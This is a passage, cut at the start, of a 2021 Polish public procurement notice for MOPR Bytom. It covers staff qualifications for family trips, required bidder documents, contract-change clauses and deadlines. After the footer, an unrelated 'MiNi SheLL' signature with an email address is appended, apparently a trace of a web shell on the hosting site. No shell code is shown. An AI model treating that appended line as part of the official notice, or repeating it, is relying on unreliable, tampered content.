ofert.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek zostanie spełniony, jeżeli co najmniej jeden z Wykonawców potwierdzi spełnienie łącznie wszystkich elementów danego warunku (tzn. potencjały Wykonawców nie sumują się).<br/>2)	W ZAKRESIE WYKSZTAŁCENIA, KWALIFIKACJI ZAWODOWYCH <br/>I DOŚWIADCZENIA OSÓB SKIEROWANYCH DO REALIZACJI ZAMÓWIENIA:<br/>Wykonawca winien wykazać, że podczas każdego z wyjazdów:<br/>a)	dysponuje lub będzie dysponował, co najmniej jednym/-ą trenerem/trenerką <br/>do prowadzenia zajęć, który/-a posiada łącznie:<br/>•	wykształcenie wyższe, tj. ukończone studia (magisterskie lub licencjackie);<br/>•	doświadczenie zawodowe, tj. legitymuje się:<br/> - minimum 2-letnim doświadczeniem jako pedagog i/lub psycholog <br/>i/lub socjoterapeuta;<br/> -	przeprowadzeniem co najmniej 3 treningów/warsztatów/szkoleń/zajęć <br/>ukierunkowanych na podniesienie umiejętności opiekuńczo-wychowawczych osób wykluczonych lub zagrożonych wykluczeniem społecznym,<br/>b)	dysponuje lub będzie dysponował, co najmniej dwoma/dwiema opiekunami/opiekunkami dla dzieci, z których każdy/-a posiada łącznie:<br/>•	kwalifikacje: opiekunki dziecięcej lub nauczyciela wychowania przedszkolnego lub nauczyciela edukacji wczesnoszkolnej lub pedagoga opiekuńczo- wychowawczego lub pedagoga/nauczyciela lub ukończone studia wyższei ukończony kurs wychowawcy kolonijnego;<br/>•	doświadczenie zawodowe, tj.: co najmniej półroczny staż pracy związany<br/>z opieką nad dziećmi bądź prowadzeniem zajęć dla dzieci lub zamiennie legitymuje się udziałem w sprawowaniu opieki nad dziećmi w ramach, <br/>co najmniej 3 treningów/warsztatów/zajęć/kolonii/obozów,<br/>c)	dysponuje lub będzie dysponował, co najmniej dwoma/dwiema opiekunami/opiekunkami dla dzieci, z których każdy/-a posiada łącznie:<br/>•	kwalifikacje oligofrenopedagoga;<br/>•	doświadczenie zawodowe, tj.: co najmniej półroczny staż pracy związany<br/>z opieką nad dziećmi bądź prowadzeniem zajęć dla dzieci ze specjalnymi potrzebami,<br/>d)	dysponuje lub będzie dysponował, co najmniej jednym/jedną koordynatorem/koordynatorką usługi posiadającym/-ą łącznie:<br/>•	wykształcenie co najmniej średnie;<br/>•	doświadczenie zawodowe polegające na koordynowaniu, co najmniej <br/>2 wyjazdów dla osób/rodzin.<br/>W związku z warunkiem szczegółowym dotyczącym osób skierowanych <br/>do realizacji zamówienia Zamawiający wymaga od Wykonawców wskazania <br/>w ofercie (w wykazie osób) imion i nazwisk osób wykonujących czynności <br/>przy realizacji zamówienia, w przypadku trenerów/trenerek wraz z informacją <br/>o posiadanym doświadczeniu.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – każdy z Wykonawców potwierdza warunek w zakresie, który go dotyczy - tj. odpowiednio warunek, o którym mowa w lit. a); lit. b); lit. c); lit d. Oznacza to, iż spełnienie warunku będzie oceniane łącznie dla wszystkich podmiotów (potencjały Wykonawców sumują się).<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, z którego wynikać będzie, które usługi wykonają poszczególni Wykonawcy (załącznik nr 4 do specyfikacji - SWZ).<br/>UWAGA:<br/>1.	Doświadczenie wykazanej osoby (lit. a) będzie również oceniane w ramach kryterium oceny ofert.<br/>2.	Trenerzy/-rki, opiekunowie/-ki oraz koordynator/-ka nie mogą figurować <br/>w Rejestrze Sprawców Przestępstw na Tle Seksualnym, o których mowa <br/>w ustawie z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (tj. Dz. U. z 2020 r. poz. 152).<br/>3.	Pod pojęciem jednego treningu/warsztatu/szkolenia/zajęć, o którym mowa <br/>w pkt 2 lit. a), Zamawiający rozumie przeprowadzenie zajęć dla jednej grupy osób wykluczonych lub zagrożonych wykluczeniem społecznym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, terminie aktualnych na dzień złożenia następujących PODMIOTOWYCH ŚRODKÓW DOWODOWYCH, tj.<br/>1)	w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej:<br/>a)	zezwolenie, licencja, koncesja lub wpis do rejestru działalności regulowanej;<br/>2)	w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej:<br/>a)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się <br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>b)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>UWAGA:<br/>wraz z wezwaniem do złożenia ww. dokumentów Zamawiający przekaże wzór według którego należy sporządzić wykazy, o których mowa powyżej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta winna składać się z:<br/>1)	formularza oferty, który stanowi załącznik nr 1 do specyfikacji (SWZ);<br/>2)	oświadczenia o niepodleganiu wykluczeniu i spełnieniu warunków udziału <br/>w postępowaniu, o którym mowa odpowiednio w cz. VI ust. 1 specyfikacji (SWZ);<br/>3)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania – o ile ofertę składa osoba prowadząca działalność gospodarczą lub podmiot wpisany do ww. rejestrów;<br/>oraz – jeżeli dotyczy:<br/>4)	w przypadku składania oferty przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (konsorcjum) - oświadczenia, z którego winno wynikać, które usługi wykonają poszczególni Wykonawcy (można skorzystać z druku określonego w załączniku nr 4 do specyfikacji - SWZ);<br/>5)	pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie <br/>do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentu, o którym mowa w pkt 3;<br/>6)	dokumentu potwierdzającego ustanowienie pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (zgodnie z art. 58 ust. 2 ustawy Prawo zamówień publicznych);<br/>7)	w przypadku składania oferty przez Wykonawcę, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - dokumentu, o którym mowa w cz. V ust. 6 specyfikacji (SWZ) (można skorzystać z druku określonego w załączniku nr 3 do specyfikacji - SWZ).<br/>UWAGA:<br/>a)	Wykonawca nie jest zobowiązany do przedłożenia dokumentu, o którym mowa w pkt 3, jeżeli Zamawiający może go uzyskać za pomocą bezpłatnych <br/>i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tego dokumentu,<br/>b)	zapis, o którym mowa w pkt 5 stosuje się odpowiednio do osoby działającej <br/>w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>c)	zapis, o którym mowa w pkt 3 i 5 oraz w uwadze lit. a) stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców <br/>(np. konsorcjum) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, w którym każdy z Wykonawców potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku polegania na zdolnościach podmiotów udostępniających zasoby, Wykonawca załącza do oferty również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>3. Ww. oświadczenie/oświadczenia winno/-y być złożone – pod rygorem nieważności – w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4. Jeśli do postępowania przystępują Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, to wszelka korespondencja prowadzona będzie z pełnomocnikiem (liderem) konsorcjum.<br/>5.	Dokumenty sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zakazuje się zmian modyfikujących ogólny charakter umowy oraz wprowadzania do umowy zmian istotnych,za które uważa się zmiany określone <br/>w art.454 ust.2 ustawyPZP.<br/>2.Z zastrzeżeniem postanowienia ust.1, Strony przewidują możliwość wprowadzenia do umowy następujących zmian:<br/>1)zastąpienia dotychczasowego Wykon. nowym Wykon.:<br/>a)w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykon. lub jego przedsiębiorstwa, o ile nowy Wykon. spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy;<br/>2)dokonania zmiany wskazanego podwykonawcy i/lub części wykonywanego <br/>przez niego zakresu podwykonawstwa, wprowadzenie nowego podwyk., rezygnowanie z podwykonawcy bądź wykonanie zamówienia przy pomocy podwyk.,pomimo niewskazania w postępowaniu o udzielenie zamówienia publicznego żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa (§ 5 ust. 1 umowy). Jeżeli zmiana albo rezygnacja z podwyk. dotyczy podmiotu, na którego zasoby Wykon. powoływał się, na zasadach określonych w art.118 ustawyPZP,w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest wykazać Zamawiającemu, że proponowany inny podwyk. lub sam Wykon. samodzielnie spełnia te warunki w stopniu nie mniejszym niż podwyk., na którego zasoby Wykon. powoływał się w trakcie postępowania o udzielenie zamówienia lub w stopniu wykazanym w ofercie,w przypadku, gdy Wykon. otrzymał punkty w ramach przyjętego w postępowaniu kryterium oceny ofert, (jeżeli dotyczy). Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, Wykonawca zobowiązany jest złożyć wraz z wnioskiem;<br/>3)zmiany wynagrodzenia brutto, w tym cen jednostkowych brutto związanych z urzędową zmianą stawki podatku od towarów i usług, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykon.(tj. podwyższenie wynagrodzenia o wartość procentowego wzrostu stawki VAT lub obniżenie wynagrodzenia o wartość procentowego obniżenia stawki VAT). Powyższa zmiana wynagrodzenia dotyczyć będzie wyłącznie części wynagrodzenia za wykonanie przedmiotu umowy,który pozostanie do wykonania po dniu wejścia w życie zmiany stawki podatku VAT.<br/>Ciężar wykazania zmian mających wpływ na zmianę kosztów wykonania przedmiotu umowy spoczywa na Wykon.,tym samym Zamawiający nie ponosi odpowiedzialności za opóźnienie w wykazaniu podstaw wpływu zmian przepisów na koszty zamówienia;<br/>4)zmiany postanowień umowy, których konieczność wprowadzenia jest wynikiem zmian obowiązującego prawa bądź działań organów państwowych, samorządowych, sądowych lub administracyjnych;<br/>5)wprowadzenia do umowy zmian dotyczących realizacji dodatkowych usług <br/>przez dotychczasowego Wykon.,których nie uwzględniono w zamówieniu podstawowym, tj. w umowie w jej pierwotnym brzmieniu, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a)zmiana Wykon. nie może zostać dokonana z powodów ekonomicznych <br/>lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji, zamówionych w ramach pierwotnej umowy,<br/>b)zmiana Wykon. spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego,<br/>c)wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy,z wyjątkiem należycie uzasadnionych przypadków,<br/>-	przy czym wprowadzanie kolejnych zmian z tego tytułu nie może następować <br/>w celu uniknięcia stosowania przepisów ustawyPZP;<br/>CIĄG DALSZY ZAKRESU ZMIAN UMOWY w SEKCJI IX - pozostałe informacje. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta winna być złożona za pośrednictwem Platformy dostępnej pod adresem: https://mopr-bytom.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 6)jeżeli konieczność zm. umowy spowod. jest okoliczn.,których Zam., działając z należytą starannością,nie mógł przewidzieć,o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierw. umowy. Wprow. kolejnych zmian z tego tyt. nie może następować w celu uniknięcia stos. przepisów ustawyPZP;<br/>7)wprow. zm. umowy,których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierw. umowy, a zm. te nie powodują zmiany ogólnego charakteru um.;<br/>8)dokon. zmiany sposobu wykon. umowy:<br/>a)spowod. siłą wyższą, ogłoszeniem stanu klęski żyw.,stanu wyjątkowego,epidem., epidemii lub innych ogran. wprow. przez władze krajowe uniemożliwiającą wykonanie umowy zgodnie z jej postanowieniami,<br/>b)w przyp. wyniknięcia rozbieżn. lub niejasności w rozumieniu pojęć użytych w umowie,których nie można usunąć w inny sposób,a zmiana będzie umożliwiać usunięcie rozbieżn. i doprecyzowanie umowy w celu jednoznacznej interpret. jej zapisów przez strony umowy,w szczególn. w przypadku wyst. zmian powsz. obow. przep. prawa,w tym prawa miejscowego w zakresie mającym wpływ na realizację umowy,<br/>c)w stosun. do sposobu wykon. zamówienia w zakresie wykon. prac/wprow. nowych prac nie wykracz. poza zakres przedmiotu zam., w syt. konieczn. usprawnienia realizacji zam.,<br/>d)których konieczn. wprow. jest wynik. zmian wytycz. dot. RPO Woj. Śl. na lata 2014-2020 lub innych wytycz. dot. realizacji projektów współfin. w ramach EFS,nie mających wpływu na cenę przedm. umowy;<br/>e)dokonania zm. miejsca realizacji zam., z przyczyn niezal. od Wykon., pod warunkiem zach. wymogów określ. w opisie przedm. zamów. Ewen. zm. w zakresie jw nast. poprzez pisemne powiad. Zam. Dok. potw. spełnienie warunków udziału w postęp., jeżeli dotyczy, Wykon. przedkłada wraz z powiad., o którym mowa pow.;<br/>9)zm. terminu wykon. umowy, jeżeli doch. terminu określ. w umowie jest niemożliwe z uwagi na:<br/>a)przyczyny,za które odpowiedzialność pon. Zam. w szczegól. będące nast. zwłoki Zam. w wykon. jego zobow. wynik. z um. lub przepisów powszechnie obow. prawa,co uniemożliwia term. wykon. umowy przez Wyk.,<br/>b)wstrzymanie realizacji umowy przez upraw. organ/inst. lub przez Zam. z przyczyn nie leżących po stronie Wykon.,o ile takie działanie powoduje, że nie jest możliwe wykon. umowy w dotychczas ustalonym term.,<br/>c)wystąpienie siły wyższej uniem. wykon. lub wykon. umowy zgodnie z jej postan.,<br/>d)zmiany po upływie składania ofert powsz. obow. przep. prawa,które miały wpływ na możl. wykon. um. w term. w niej ustal.,-termin umowy może ulec zm. o czas, w jakim wyżej wskaz. okoliczn. wpłyn. na termin wykon. um. przez Wykon., to jest uniemożl. Wykon. termin.j realizacji um. Zmiany wprow. <br/>na podst. ww. przesłanek mogą wprow. zm. zakresu umowy i odpowiadającą jej zmianę wynagr. Wykon.,przy czym nie więcej niż 10% w stosunku do wynagr. określonego w §3 ust.1 zdanie pierwsze umowy;<br/>10)zmiany osób wskazanych w §1 ust.5 umowy w przypadku:<br/>a)ważnych zdarzeń losowych dotyczących tej osoby,<br/>b)niewywiązywania się przez tę osobę z ciążących na niej obowiązków,<br/>c)jeżeli zmiana tej osoby stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykon.;<br/>W przypadku zmiany, nowa osoba wskazana przez Wykon. winna posiadać wykształcenie, kwalifikacje i doświadczenie co najmniej takie jakich wymagano w postępowaniu o udzielenie zamówienia publicznego, a w przypadku zmiany osoby, której doświadczenie podlegało ocenie w kryterium oceny ofert, również doświadczenie, które pozwalałoby uzyskać Wykon. w ramach przyjętego kryterium oceny ofert, co najmniej taką samą ilość punktów, jak za osobę wskazaną w ofercie.<br/>W przypadku dokonywania zmiany osoby wskazanej do realizacji zamówienia <br/>§1 ust.5 umowy zdanie drugie i trzecie, stosuje się;<br/>11)wprowadzenia zmian do umowy w uzasadnionych przypadkach, innych niż wyżej opisanych,gdy zachodzi konieczność ich wprowadzenia z powodu okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com